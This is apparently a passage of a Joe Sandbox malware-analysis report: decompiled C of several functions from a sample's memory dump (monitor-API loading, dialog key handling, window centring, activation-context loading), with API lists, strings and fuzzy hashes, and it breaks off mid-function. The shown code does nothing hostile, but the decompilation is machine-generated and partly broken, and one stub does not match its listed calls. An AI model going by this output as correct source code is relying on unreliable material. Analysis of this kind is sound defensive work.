Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$,dD$AfxOldWndProc423$ime
API String ID: 1191297049-714433792
Opcode ID: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
Instruction ID: 84e3f26e1d5758fcd2ef64f535b58e951b2309da213ef0e04ba7174f59460a39
Opcode Fuzzy Hash: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
Instruction Fuzzy Hash: 44619071900219ABDB209B61DD49BEB7BB8EF44325F100576F905B32D1C7389A81CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00407777, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00407777() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x44629c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x4462a0 = E0040771F(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x446280 = 0;
						 *0x446284 = 0;
						 *0x446288 = 0;
						 *0x44628c = 0;
						 *0x446290 = 0;
						 *0x446294 = 0;
						 *0x446298 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x446280 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x446284 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x446288 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x44628c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x446294 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x446290 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x446298 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x44629c = 1;
					return _t5;
				} else {
					_t24 =  *0x446290; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,004078C3,?,?,?,?,?,?,?,00409759,00000000,00000002,00000028), ref: 004077A0
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004077BC
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004077CD
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004077DE
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004077EF
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00407800
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00407811
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00407822

Strings

EnumDisplayMonitors, xrefs: 004077FA
MonitorFromWindow, xrefs: 004077C7
EnumDisplayDevicesA, xrefs: 0040781C
USER32, xrefs: 00407796
GetMonitorInfoA, xrefs: 0040780B
MonitorFromPoint, xrefs: 004077E9
MonitorFromRect, xrefs: 004077D8
GetSystemMetrics, xrefs: 004077B6

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
Instruction ID: 460c29bc39fe871b276e37692eac700ddae52ba8710db786ada5c1a6ecd8e9b2
Opcode Fuzzy Hash: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
Instruction Fuzzy Hash: E52181B5E05A05BBC7017F29ACC542ABBE4B28B74036655BFE008E22A0D7BC6045DF5F

Uniqueness

Uniqueness Score: -1.00%

Function 0041947F, Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041947F(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E004192DC(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E004085E2(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E00406B97( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E0041932E(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E00418DD9(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E004037E3(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E0041F71D(E004333FF, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E00409C97(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E00409C97(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E00418D8C(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E00418D8C(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E0040D2C7(_t229, _t232, _t240);
																	} else {
																		_t172 = E0040D279(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E0040CE23(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E00418E4A(_a4, _v24, _v44);
																			} else {
																				_t174 = E00409C97(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E00418E84(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E0040CCE0(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E00405D69(_t255, _v36, _t229);
																			} else {
																				_t191 = E00409C97(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E00418E84(_t244);
																				E0041904E(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E00418E29(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E004191CF(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E0040C9F6(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E0040CA70(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E0040CACD();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E004190C9(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E00418D8C(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E0041947F(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E004133E2(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E00409C97(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E00418FE1(_t232, E00409C97(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E0041904E(_t229, _t232, _t260, _v24, E00409C97(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E004191FC(_a4, _v24, E00409C97(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E0041F7C2(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E0040CCE0(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

APIs

GetFocus.USER32 ref: 004194D2
IsWindowEnabled.USER32(?), ref: 0041952E
__EH_prolog3_catch.LIBCMT ref: 0041957C
GetFocus.USER32 ref: 0041959C
GetParent.USER32(?), ref: 004195E7
GetParent.USER32(?), ref: 004195F7
GetKeyState.USER32(00000012), ref: 004196B5
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419769
GetFocus.USER32 ref: 0041977C
GetFocus.USER32 ref: 00419789
IsWindow.USER32(?), ref: 004197A1
GetFocus.USER32 ref: 004197AD
IsWindow.USER32(?), ref: 004197C3
GetFocus.USER32 ref: 004197C9
GetKeyState.USER32(00000010), ref: 004197F2
MessageBeep.USER32(00000000), ref: 004198E9

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
Instruction ID: b37fad4d356144a07009b57323d5ed8e9dfbb1bd6742926c0fb4062ff0804fd9
Opcode Fuzzy Hash: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
Instruction Fuzzy Hash: 04F18C31910206EBDF21AF65C8A4BEF7BA5AF44354F14402FE815A72A1DB3C9DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040966B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040966B(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E0040C981(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E00407923(_t121, E004078B8(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E00403ED6();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E00407923(_t121, E004078B8(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E0040CC5E(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

GetParent.USER32(?), ref: 00409698
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004096BB
GetWindowRect.USER32 ref: 004096D5
GetWindowLongA.USER32 ref: 004096EB
CopyRect.USER32 ref: 00409738
CopyRect.USER32 ref: 00409742
GetWindowRect.USER32 ref: 0040974B
CopyRect.USER32 ref: 00409767

Strings

(, xrefs: 00409703

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
Instruction ID: bc6882baaa5189169e0c0b7d53e15d52d0ad1cceba646d15ad8487012d1c9b7f
Opcode Fuzzy Hash: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
Instruction Fuzzy Hash: 39513072910219ABDB00DFA8CD85EEEBBB9AF88314F154136F905F3291D734AD41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D31B, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D31B(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
				void* _v8;
				void* _v20;
				void* _t16;

				_t16 = __ecx;
				_a100 = _a100 + __edx;
			}

0x0040d31b
0x0040d320

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040D349
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040D35B
GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040D36D
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040D37F

Strings

ActivateActCtx, xrefs: 0040D35D
KERNEL32, xrefs: 0040D323
$dD, xrefs: 0040D31B
CreateActCtxW, xrefs: 0040D343
DeactivateActCtx, xrefs: 0040D36F
ReleaseActCtx, xrefs: 0040D34B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: $dD$ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-1206286444
Opcode ID: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
Instruction ID: 8662d49a9f014bf3ccbdae78ec47047f6782647d52dd8aec524ec0572c096a73
Opcode Fuzzy Hash: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
Instruction Fuzzy Hash: EDF0F8B8945320AFCF109F71BD09A897EE8E60F7917225077A400A3266D67991008E9F

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDF7, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041BDF7(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
